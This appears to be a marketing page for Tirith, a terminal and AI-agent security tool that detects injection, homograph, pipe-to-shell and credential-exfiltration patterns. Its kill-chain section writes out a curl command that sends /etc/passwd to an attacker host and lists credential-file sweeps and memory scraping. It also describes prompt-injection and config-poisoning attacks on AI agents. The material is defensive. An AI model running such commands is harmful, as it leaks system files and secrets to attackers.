Tirith – Detect terminal injection, homograph, and pipe-to-shell attacks

Tirith, a new terminal security tool, intercepts commands and pastes to detect homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, and 200+ other threats in under 1ms. It covers 208 detection rules across 29 threat categories, targeting terminal and AI-agent attack surfaces, and can intercept 5 of 6 kill chain stages in supply chain attacks.

Your browser would catch this. Your terminal won't. Tirith intercepts commands and pastes in your terminal, detecting homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, data exfiltration, and 200+ other threats, in under 1ms. See It In Action Click a scenario to see how Tirith responds. What It Catches 208 detection rules across 29 threat categories, covering every angle of terminal and AI-agent attack surface. Hostname & Homograph Homograph attacks, punycode, confusable characters, IDN spoofing Terminal Injection ANSI escapes, bidi overrides, zero-width and control characters Command Execution Pipe-to-shell, decode-execute, command substitution, and dangerous invocations Credential Detection API keys, tokens, private keys, and high-entropy secrets in input Supply Chain & Ecosystem Git, Docker, pip, npm, registries — package and supply-chain attack surface Config Security AI config poisoning, prompt injection, and MCP server validation AI Config Drift Snapshot-diff changes to AI configs: hidden instructions and tool-use escalation Threat Intelligence Known-malicious packages, URLs, and IPs from the signed threat database Code Execution Executing from tmp/untrusted locations and dynamic or obfuscated execution Contextual Safety Production cloud/k8s, labeled SSH hosts, IaC apply/destroy, and container exec Hidden Content Hidden CSS/color text, comments, and notebook/HTML hidden instructions Cloaking Servers returning different content to AI bots vs browsers Supply Chain Is the New Attack Surface TeamPCP compromised LiteLLM, Aqua Trivy, and Checkmarx in 5 days. No zero-day needed, just stolen credentials and commands your terminal happily executed. Tirith won't stop a trojaned package from being installed. But it catches the payload before it does damage, cutting the blast radius at every stage of the kill chain. Initial Access Attack Stolen credentials used to push trojaned package LiteLLM, Aqua Trivy, Checkmarx, all in 5 days Tirith Response Outside terminal scope. Tirith guards what runs after install. Credential Harvesting Attack Payload exports API keys, tokens, and secrets from env vars $AWS SECRET ACCESS KEY, $GITHUB TOKEN, $ANTHROPIC API KEY Tirith Response sensitive env export Memory Scraping Attack Reads /proc/ /mem to extract secrets from running processes Every secret in your CI runner or dev machine memory Tirith Response proc mem access Privilege Escalation Attack Mounts host root filesystem via Docker remote daemon Full host access from inside a container Tirith Response docker remote priv esc Persistence Attack Sweeps .aws/credentials, .ssh/id rsa, .gnupg/ for lateral movement Every credential file on disk Tirith Response credential file sweep Exfiltration Attack Uploads stolen data to attacker-controlled server via curl curl -d @/etc/passwd https://c2.attacker.com/collect Tirith Response data exfiltration 5 of 6 kill chain stages intercepted Tirith can't prevent a compromised package from being published. But every post-install payload credential theft, memory scraping, privilege escalation, exfiltration gets caught before it does damage. That's the difference between a breach and a blocked command. How It Works A 3-tier pipeline that balances speed with thoroughness. Fast Gate Regex-powered initial filter eliminates 99% of clean commands instantly. Extract Parses URLs, Docker references, and package identifiers from complex commands. Analyze 200+ rules across 29 categories: homographs, injection, supply-chain, threat intel, credential detection, AI-config drift, and more. AI Agent Security Protect AI coding agents at every layer, from the configs they read to the skills they download to the commands they execute. One command to set up. Zero friction on clean input. MCP Server: 7 Tools AI agents call these tools before taking action. Run tirith mcp-server to start. tirith check command Analyze shell commands tirith check url Score URLs for attacks tirith check paste Check pasted content tirith scan file Scan files for hidden content tirith scan directory Recursive directory scan tirith verify mcp config Validate MCP configs tirith fetch cloaking Detect server-side cloaking Skill & Plugin Scanning Download skills, plugins, and MCP tools without worrying. Tirith scans every file for obfuscated payloads, dynamic code execution, and secret exfiltration before your agent runs it. Config Poisoning Scans 50+ AI config file patterns .cursorrules, CLAUDE.md, .mcp.json, and more for prompt injection, invisible Unicode, and permission bypass attempts. Hidden Content Detects content invisible to humans but readable by AI: CSS hiding, color tricks, sub-pixel PDF text, and HTML comment injection. Server Cloaking Compares responses across 6 user-agents to catch servers that serve different content to AI bots vs browsers. AI Config Drift Snapshot your AI configs, then diff to catch hidden instructions or tool-use escalation slipped in since — via tirith ai snapshot and tirith ai diff. Editor Diagnostics LSP tirith lsp publishes findings inline in your editor as you open and edit AI configs, install docs, and source files. One Command Setup Commands Everything runs locally. Zero network calls unless you explicitly ask. Analyze | tirith check -- <cmd | Analyze a command without executing it | | tirith paste | Check pasted content auto-called by shell hooks | | tirith scan path | Scan files/dirs for hidden content, config poisoning, malicious code. Supports --sarif and --ci --fail-on high | | tirith run <url | Safe curl|bash replacement. Downloads, analyzes, shows SHA256, opens for review, executes after confirmation | | tirith explain --rule <id | Docs, examples, and remediation for any of the 200+ rule IDs | Investigate | tirith score <url | Break down a URL's trust signals | | tirith diff <url | Byte-level comparison showing where suspicious characters hide | | tirith fetch <url | Detect server-side cloaking different content for bots vs browsers | | tirith why | Explain the last rule that triggered | AI & Editor | tirith ai | Snapshot and diff AI configs for hidden-instruction & tool-use drift scan, diff, quarantine, snapshot | | tirith lsp | Language Server for inline editor diagnostics as you edit configs, docs, and code | | tirith mcp-server | Run as MCP server over JSON-RPC stdio 7 tools | | tirith setup <tool | One-command setup for Claude Code, Codex, Cursor, VS Code, Windsurf | | tirith gateway run | MCP gateway proxy for intercepting AI agent shell tool calls | Policy & Trust | tirith onboard | Detect your repo and environment, then recommend a policy template | | tirith policy | Scaffold, validate, test, and tune .tirith/policy.yaml init, validate, test, tune | | tirith rule | Author custom regex or semantic when:-DSL detection rules test, validate, explain | | tirith trust | Manage trusted patterns, narrow + 30-day TTL by default add, list, explain, gc | | tirith threat-db | Update and query the signed threat database update, status, explain, sources | Operate | tirith receipt | Track and verify scripts run through tirith run last, list, verify | | tirith checkpoint | Snapshot files before risky operations, roll back if needed create, restore, diff | | tirith dashboard | Local security dashboard from the audit log export, serve | | tirith audit | Audit log management for compliance export, stats, report | | tirith doctor | Diagnostics for hooks, policy, and setup --quick, --fix, --compat | | tirith init | Print the shell hook for your shell profile | Free for Everyone. Built for Teams. All detection rules run at every tier. Paid plans add compliance, policy distribution, and enterprise integrations. Community Free forever Everything you need for terminal security. No account required. - ✓Full detection engine all 200+ rules - ✓Shell hooks: Bash, Zsh, Fish, PowerShell - ✓MCP server for AI coding tools - ✓Local JSONL audit log - ✓YAML policy system - ✓SARIF output for CI/CD - ✓Zero network calls, fully offline - ✓Cross-platform: macOS, Linux, Windows - ✓Open source Team / Enterprise Contact us Everything in Community, plus: - MITRE ATT&CK technique mapping - Remote policy distribution - Centralized audit log collection - Custom DLP redaction patterns - Webhooks: Slack, Teams, PagerDuty - SSO/SAML: Okta, Azure AD - Air-gapped / on-premises deployment - Dedicated account manager & SLA Installation Install Tirith with your favorite package manager. brew install sheeki03/tap/tirith Shell Activation zsh ~/.zshrc eval "$ tirith init --shell zsh " bash ~/.bashrc eval "$ tirith init --shell bash " fish ~/.config/fish/config.fish tirith init --shell fish | source PowerShell $PROFILE tirith init --shell powershell | Invoke-Expression